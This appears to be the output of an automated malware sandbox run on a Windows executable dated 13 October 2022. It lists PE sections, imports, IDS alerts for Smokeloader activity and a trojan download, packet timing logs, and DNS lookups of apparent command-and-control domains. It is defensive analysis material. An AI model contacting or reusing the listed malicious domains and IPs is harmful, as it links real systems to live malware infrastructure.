                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x1d4fa0x1d600False0.5102061170212766data6.3483492771726775IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .data0x1f0000x16dddc0x12400False0.8716422303082192data7.530290617111047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0x18d0000x4c380x4e00False0.7099859775641025data6.2514954515486245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                RT_ICON0x18d2e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                                                                                                RT_ICON0x18db880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                RT_ICON0x1901300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                                                                                                RT_STRING0x1913f80x42dataRaeto-RomanceSwitzerland
                                                                                                                RT_STRING0x1914400x280dataRaeto-RomanceSwitzerland
                                                                                                                RT_STRING0x1916c00x3c6dataRaeto-RomanceSwitzerland
                                                                                                                RT_STRING0x191a880x1acdataRaeto-RomanceSwitzerland
                                                                                                                RT_ACCELERATOR0x1912080x90dataRaeto-RomanceSwitzerland
                                                                                                                RT_GROUP_ICON0x1911d80x30dataRaeto-RomanceSwitzerland
                                                                                                                RT_VERSION0x1912b80x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                                                                                                                None0x1912980xadataRaeto-RomanceSwitzerland
                                                                                                                None0x1912a80xadataRaeto-RomanceSwitzerland
                                                                                                                DLLImport
                                                                                                                KERNEL32.dllGetVolumeInformationA, GetComputerNameW, VerLanguageNameW, LocalFlags, InterlockedDecrement, GetSystemTimeAdjustment, SetLocaleInfoA, FindNextVolumeW, GetConsoleAliasExesLengthW, EnumSystemCodePagesA, FindNextFileA, CopyFileExA, MoveFileWithProgressA, VerifyVersionInfoA, LocalSize, DebugBreak, GlobalGetAtomNameA, MapViewOfFileEx, GetWindowsDirectoryA, DeleteFileA, lstrlenW, IsBadReadPtr, FindResourceW, GetComputerNameExW, GetProcAddress, GetStringTypeW, GetFileTime, GetConsoleAliasesLengthA, DeleteVolumeMountPointA, GetPrivateProfileStructA, GetOEMCP, CreateIoCompletionPort, CopyFileA, lstrcpynW, WriteConsoleA, GetCommandLineW, GetProfileSectionA, ReadConsoleA, SearchPathA, GetCommandLineA, FindFirstChangeNotificationA, VerifyVersionInfoW, GetCalendarInfoA, GetConsoleTitleA, CreateActCtxW, FormatMessageW, GetModuleHandleW, CreateJobObjectA, GetConsoleFontSize, FindNextVolumeA, GlobalFlags, GetCurrentConsoleFont, GetModuleHandleA, LoadLibraryW, EnterCriticalSection, GetComputerNameA, GetStringTypeExW, OpenMutexA, FindResourceA, RtlCaptureContext, InterlockedCompareExchange, LeaveCriticalSection, GetPrivateProfileStructW, DeleteFiber, InterlockedExchange, EnumDateFormatsW, EnumCalendarInfoA, InterlockedIncrement, GetNamedPipeHandleStateW, UnregisterWait, LocalAlloc, GetLogicalDriveStringsA, SetLastError, WriteConsoleOutputA, LoadLibraryA, WideCharToMultiByte, MultiByteToWideChar, Sleep, InitializeCriticalSection, DeleteCriticalSection, RtlUnwind, RaiseException, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, MoveFileA, GetStartupInfoW, LCMapStringA, LCMapStringW, GetCPInfo, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, VirtualAlloc, HeapReAlloc, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetACP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, HeapSize, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, CreateFileA, CloseHandle, FlushFileBuffers
                                                                                                                USER32.dllCharUpperBuffA
                                                                                                                ADVAPI32.dllSetThreadToken
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                Raeto-RomanceSwitzerland
                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                192.168.2.5172.67.203.21349696802039103 10/13/22-13:07:19.527031TCP2039103ET TROJAN Suspected Smokeloader Activity (POST)4969680192.168.2.5172.67.203.213
                                                                                                                192.168.2.545.138.74.5249697802018581 10/13/22-13:07:17.952056TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4969780192.168.2.545.138.74.52
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Oct 13, 2022 13:07:14.416759014 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.449944019 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.450094938 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.450252056 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.450289965 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.483253002 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.483299971 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587687969 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587780952 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587816000 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587846994 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587877989 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587913990 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587943077 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587975025 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.587994099 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.588001966 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.588030100 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.588041067 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.588061094 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.588079929 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.588090897 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.588135004 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.623987913 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624043941 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624245882 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624267101 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624301910 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624330997 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624357939 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624362946 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624386072 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624414921 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624417067 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624442101 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624456882 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624469995 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624496937 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624516010 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624526024 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624552965 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624571085 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624581099 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624608040 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624627113 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624639034 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624665976 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624680042 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624692917 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624720097 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624733925 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624747992 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624775887 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624789000 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.624803066 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624829054 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.624845028 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.669558048 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669604063 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669625998 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669647932 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669692039 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669744968 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.669812918 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669821024 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.669872999 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669907093 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669920921 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.669956923 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.669990063 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670002937 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670021057 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670048952 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670057058 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670078993 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670109987 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670116901 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670140982 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670171022 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670177937 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670202971 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670232058 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670238972 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670262098 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670293093 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670299053 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670325041 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670356989 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670362949 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670387030 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670417070 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670423985 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670448065 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670479059 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670481920 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670510054 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670540094 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670546055 CEST4969680192.168.2.5172.67.203.213
                                                                                                                Oct 13, 2022 13:07:14.670571089 CEST8049696172.67.203.213192.168.2.5
                                                                                                                Oct 13, 2022 13:07:14.670602083 CEST8049696172.67.203.213192.168.2.5
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Oct 13, 2022 13:07:14.386101007 CEST192.168.2.58.8.8.80x2d9aStandard query (0)furubujjul.netA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:30.477519989 CEST192.168.2.58.8.8.80x6c77Standard query (0)kkh.eiwagggg.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:35.043127060 CEST192.168.2.58.8.8.80x327Standard query (0)pelegisr.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:36.552243948 CEST192.168.2.58.8.8.80xcc9bStandard query (0)furubujjul.netA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:59.246421099 CEST192.168.2.58.8.8.80xa874Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:59.785409927 CEST192.168.2.58.8.8.80xb51aStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:00.259823084 CEST192.168.2.58.8.8.80x630aStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:00.532668114 CEST192.168.2.58.8.8.80x1552Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.166259050 CEST192.168.2.58.8.8.80xde8cStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.388123989 CEST192.168.2.58.8.8.80x540eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.610858917 CEST192.168.2.58.8.8.80xd2f4Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.041383982 CEST192.168.2.58.8.8.80x9881Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.558623075 CEST192.168.2.58.8.8.80xb865Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.810128927 CEST192.168.2.58.8.8.80x5111Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:03.788726091 CEST192.168.2.58.8.8.80x7c80Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:04.162729025 CEST192.168.2.58.8.8.80x1fe8Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:05.443161011 CEST192.168.2.58.8.8.80xaf9eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:06.282427073 CEST192.168.2.58.8.8.80x91a3Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:08.111460924 CEST192.168.2.58.8.8.80x333eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:08.291451931 CEST192.168.2.58.8.8.80x782dStandard query (0)www.rukangiralawchambers.orgA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.110841990 CEST192.168.2.58.8.8.80xe059Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.464833021 CEST192.168.2.58.8.8.80x29b7Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.683912992 CEST192.168.2.58.8.8.80x9f5dStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.103157043 CEST192.168.2.58.8.8.80x2e1Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.604708910 CEST192.168.2.58.8.8.80xba5Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.838524103 CEST192.168.2.58.8.8.80xbb6bStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.016379118 CEST192.168.2.58.8.8.80x2140Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.189095974 CEST192.168.2.58.8.8.80xd67dStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.401705027 CEST192.168.2.58.8.8.80x5e30Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.608078957 CEST192.168.2.58.8.8.80xab7Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.723498106 CEST192.168.2.58.8.8.80x1b0Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.922321081 CEST192.168.2.58.8.8.80x5149Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.211529016 CEST192.168.2.58.8.8.80xadb5Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.400568962 CEST192.168.2.58.8.8.80xb65cStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.595623016 CEST192.168.2.58.8.8.80xe34eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.822103977 CEST192.168.2.58.8.8.80x37deStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:13.023207903 CEST192.168.2.58.8.8.80xcda7Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:13.207417011 CEST192.168.2.58.8.8.80x3280Standard query (0)keziheritier.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:15.761296034 CEST192.168.2.58.8.8.80xdf9eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:15.965895891 CEST192.168.2.58.8.8.80x98baStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.015324116 CEST192.168.2.58.8.8.80xfd72Standard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.158803940 CEST192.168.2.58.8.8.80xc69bStandard query (0)keziheritier.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.320270061 CEST192.168.2.58.8.8.80xa41cStandard query (0)aaa.apiaaaeg.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.115122080 CEST192.168.2.58.8.8.80xd59aStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.611670971 CEST192.168.2.58.8.8.80x89f3Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:18.808104992 CEST192.168.2.58.8.8.80x55d2Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.142499924 CEST192.168.2.58.8.8.80x8cdeStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.361171007 CEST192.168.2.58.8.8.80xf0a4Standard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.581949949 CEST192.168.2.58.8.8.80xb4dStandard query (0)libapi.tourl.picsA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:20.605037928 CEST192.168.2.58.8.8.80x7db0Standard query (0)jamesmillion.xyzA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:21.239700079 CEST192.168.2.58.8.8.80x995eStandard query (0)avtlsgosecure.comA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:28.141550064 CEST192.168.2.58.8.8.80x342aStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:40.503891945 CEST192.168.2.58.8.8.80xe799Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:51.784535885 CEST192.168.2.58.8.8.80x8491Standard query (0)en.eredirected.xyzA (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:51.785352945 CEST192.168.2.58.8.8.80xcd1Standard query (0)en.xml-post.xyzA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Oct 13, 2022 13:07:14.409872055 CEST8.8.8.8192.168.2.50x2d9aNo error (0)furubujjul.net172.67.203.213A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:14.409872055 CEST8.8.8.8192.168.2.50x2d9aNo error (0)furubujjul.net104.21.93.30A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:30.504026890 CEST8.8.8.8192.168.2.50x6c77No error (0)kkh.eiwagggg.com172.67.144.83A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:30.504026890 CEST8.8.8.8192.168.2.50x6c77No error (0)kkh.eiwagggg.com104.21.63.82A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:35.062700033 CEST8.8.8.8192.168.2.50x327No error (0)pelegisr.com185.220.204.62A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:36.571547985 CEST8.8.8.8192.168.2.50xcc9bNo error (0)furubujjul.net172.67.203.213A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:36.571547985 CEST8.8.8.8192.168.2.50xcc9bNo error (0)furubujjul.net104.21.93.30A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:59.265819073 CEST8.8.8.8192.168.2.50xa874No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:59.265819073 CEST8.8.8.8192.168.2.50xa874No error (0)star-mini.c10r.facebook.com157.240.17.35A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:07:59.804907084 CEST8.8.8.8192.168.2.50xb51aNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:00.279546976 CEST8.8.8.8192.168.2.50x630aNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:00.856194019 CEST8.8.8.8192.168.2.50x1552No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.187089920 CEST8.8.8.8192.168.2.50xde8cNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.411019087 CEST8.8.8.8192.168.2.50x540eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:01.903173923 CEST8.8.8.8192.168.2.50xd2f4No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.359075069 CEST8.8.8.8192.168.2.50x9881No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.576293945 CEST8.8.8.8192.168.2.50xb865No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:02.829756975 CEST8.8.8.8192.168.2.50x5111No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:03.806159973 CEST8.8.8.8192.168.2.50x7c80No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:04.270587921 CEST8.8.8.8192.168.2.50x1fe8No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:05.460616112 CEST8.8.8.8192.168.2.50xaf9eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:06.301755905 CEST8.8.8.8192.168.2.50x91a3No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:08.130846024 CEST8.8.8.8192.168.2.50x333eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:08.501562119 CEST8.8.8.8192.168.2.50x782dNo error (0)www.rukangiralawchambers.orgrukangiralawchambers.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:08.501562119 CEST8.8.8.8192.168.2.50x782dNo error (0)rukangiralawchambers.org198.23.58.153A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.218518019 CEST8.8.8.8192.168.2.50xe059No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.482587099 CEST8.8.8.8192.168.2.50x29b7No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:09.701740026 CEST8.8.8.8192.168.2.50x9f5dNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.412426949 CEST8.8.8.8192.168.2.50x2e1No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.623995066 CEST8.8.8.8192.168.2.50xba5No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:10.856339931 CEST8.8.8.8192.168.2.50xbb6bNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.036367893 CEST8.8.8.8192.168.2.50x2140No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.208365917 CEST8.8.8.8192.168.2.50xd67dNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.421279907 CEST8.8.8.8192.168.2.50x5e30No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.640070915 CEST8.8.8.8192.168.2.50xab7No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
